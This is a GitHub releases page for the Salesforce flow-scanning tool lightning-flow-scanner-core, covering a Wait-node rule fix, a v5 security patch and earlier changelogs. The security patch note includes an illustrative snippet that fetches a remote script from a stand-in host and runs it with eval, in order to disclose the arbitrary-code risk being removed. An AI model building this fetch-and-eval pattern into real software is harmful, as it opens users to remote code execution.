Releases: Flow-Scanner/lightning-flow-scanner-core
MissingFaultPath bug fix for Wait nodes
v5.9 — Fix MissingFaultPath rule for Wait nodes
This release fixes issue #272, contributed by @chazwatkins, where the MissingFaultPath rule incorrectly flagged all "Wait" nodes.
The bug was caused because the rule did not distinguish between different Wait subtypes. In Salesforce flows, only "Wait For Conditions" nodes can have fault paths. "Wait for Amount of Time" (WaitDuration) and "Wait Until Date" (WaitDate) nodes cannot have fault paths. This fix updates the MissingFaultPath rule to properly ignore WaitDuration and WaitDate subtypes, while continuing to check for applicable cases.
Salesforce Wait Nodes Overview
1. Wait for Conditions
- Lets a flow pause until certain conditions are true.
- This is essentially an event-based pause and can have error handling logic attached — so a fault path is valid here.
- For more details, refer to the Salesforce documentation on Wait for Conditions.
2. Wait for Amount of Time (WaitDuration)
- Pauses flow for a fixed amount of time.
- This is purely time-based with no real failure conditions that Salesforce would allow fault handling for.
- Therefore, no fault path option is provided.
- For more information, see the Salesforce documentation on Wait for Amount of Time.
3. Wait Until Date (WaitDate)
- Pauses flow until a given date/time.
- Also purely time-based → no fault path.
- For further details, check the Salesforce documentation on Wait Until Date.
Changes
- Added
isValidSubtypemethod to properly handle applicable element subtypes. - Updated MissingFaultPath rule execution logic.
Contributors
Assets 2
Security Patch
🚨 v5 – Security Patch
This release delivers security improvements and we have removed custom rules.
🔒 Security Fixes
- Removed custom rule loader
- Previous versions allowed configuration files to load JavaScript from external sources.
- This created a arbitrary code execution (ACE) risk, where malicious configs could execute arbitrary code.
execute(flow: Flow, ruleOptions?: {}): RuleResult {
fetch("https://example.com/script.js")
.then(res => res.text())
.then(code => {
eval(code); // 🚨 ACE happens here
});
return null;
}
- In v5, this behavior has been completely removed. Only built-in rules are now supported.
- Removed dynamic paths in configuration
- Config files can no longer point to external scripts or resources.
🛡 Dependency & Audit Updates
- All dependencies updated to their latest secure versions.
- Applied
npm audit fixto patch known vulnerabilities.
📌 Impact
- Custom rules functionality has been retired.
- All packages that relied on the custom rule loader are unpublished
Note on Forks:
Using a fork? Check node_modules/ for RuleLoader.ts or RuleLoader.js. If present, it’s vulnerable.
For patched versions, see https://github.com/Flow-Scanner
4.50.0
What's Changed
- Drop support for IRuleDefinition
- chore: bump npm deps by @junners in #254
- Feat/streamline rule def by @junners in #255
Full Changelog: v4.49.0...v4.50.0
Contributors
Assets 2
4.49.0
What's Changed
- MissingNullHandler triggered on subflow output variables #67 by @RubenHalman in #241
- Replace table with referable headers by @RubenHalman in #248
Full Changelog: v4.48.0...v4.49.0
Contributors
Assets 2
4.48.0
Full Changelog: v4.47.0...v4.48.0
4.47.0
What's Changed
- Update issue templates by @RubenHalman in #238
- script:deploy test flows by @RubenHalman in #239
- small fixes for Missing Null Handler
Full Changelog: v4.46.0...v4.47.0
Contributors
Assets 2
4.46.0 | Community Release
4.45.0 | Community Release
What's new?
- Minor fix to propagate suppression entity from advanced rule to rule common
Full Changelog: v4.44.0...v4.45.0
4.44.0 | Community Relese
What's new?
New rule disabled option. This option will bubble up rules and be intentional on the configurations. Bubbling up rules would also increase visibility of new rules that can be adopted
rules:
MissingFaultPath:
disabled: trueFull Changelog: v4.43.0...v4.44.0
v4.43.0
What's Changed
**Beta** Advanced Rule Configuration
Advanced rules provide granular control by allowing rules to be intentionally disabled at the rule level, ensuring consistent application across all flows. Additionally, the concept of suppressions is introduced, enabling users to "whitelist" specific components. This mechanism allows for exceptions to be defined, offering flexibility in rule enforcement while maintaining overall governance and compliance.
JSON
{
"rules": {
"<RuleName>": {
"path": "local_path_of_your_js_file", // optional: when defined, this configuration will be used for the engine to recognize your custom rule
"severity": "<User Configured Severity>",
"expression": "<User Configured Expression which only applies to rules that take in `options`>",
"disabled": "true", // optional: when true, rule will not be applied to all flows being scanned
"suppressions": ["<User Configured Suppressions>"] // optional: when defined, takes an array of suppressed elements (not based on name but on specific type)
}
}
}YAML
rules:
MissingFaultPath: # User Defined Rule configuration
path: "local_path_of_your_js_file" # Optional: when defined, this configuration will be used for the engine to recognize your rule
severity: error # Optional: User Defined severity, can be `info`, `warn`, `error`
expression: ">=58" # Optional: User defined expression, only applies if rule is Configurable=true
disabled: "true" # Optional: when true, rule will not be applied to all flows being scanned
suppressions: # Optional: when defined, takes an array of elements to be suppressed, keys can be found on suppressionElements on the rule definition
- LogACall # Optional: when defined, rule engine will look at suppressionElement defined on the rule to match against this listActivation
To activate advanced rule set environment variable IS_NEW_SCAN_ENABLED=true prior to running your commands
MacOs:
export IS_NEW_SCAN_ENABLED=true
sf flow scanWindows
setx IS_NEW_SCAN_ENABLED=true
sf flow scanFull Changelog: v4.42.0...v4.43.0